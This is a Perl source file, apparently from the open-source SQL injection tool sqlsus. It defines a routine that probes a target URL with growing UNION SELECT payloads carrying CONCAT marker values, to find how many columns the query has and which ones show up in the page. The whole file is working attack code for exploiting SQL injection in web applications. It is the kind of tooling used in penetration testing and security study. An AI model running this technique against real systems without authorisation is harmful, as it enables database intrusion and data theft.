package find;

# This file is part of sqlsus
#
# Copyright (c) 2008,2009 sativouf
# http://sqlsus.sf.net/
#
# Licensed under the GPL version 2.0 license.
# See LICENSE file or
# http://www.gnu.org/licenses/old-licenses/gpl-2.0.html

use strict;
use warnings;

use POSIX;

##################################
# Find the correct UNION ALL SELECT ALL blabla order so that :
# - We have the same number of columns
# - We can see resquests answers
sub select_columns {
	
	my $inj = "$conf::url_start $conf::union_select CONCAT(0x5,1,0x7)";
	
	for my $i (1..$conf::max_select_cols) {
		last if $main::interrupt;

		my $res = &select::inject($inj);
		# HTTP ERROR on first try
		if (not $res->is_success) {
			if ( $i == 1) {
				print STDERR "[+] HTTP Error : " . $res->status_line . "\n";
				return 0;
			} else {
				redo;
			}
		}
		
		print STDERR "\rFinding UNION columns : $i";

		if ($res->content =~ /\x05(\d+)\x07/) {
			@conf::columns = split //, "0"x$i;
			$_ = $res->content;
			while ($_ =~ /\x05(\d+)\x07/) {
				$conf::columns[$1-1] = 1;
				s/\x05\d+\x07//;
			}
			print STDERR "\r" . " "x30 . "\r";
			return 1;
		}
	
		$inj .= ",CONCAT(0x5," . ($i + 1) . ",0x7)";
	}
	print STDERR "\r" . " "x30 . "\r";
	return 0;
}

1
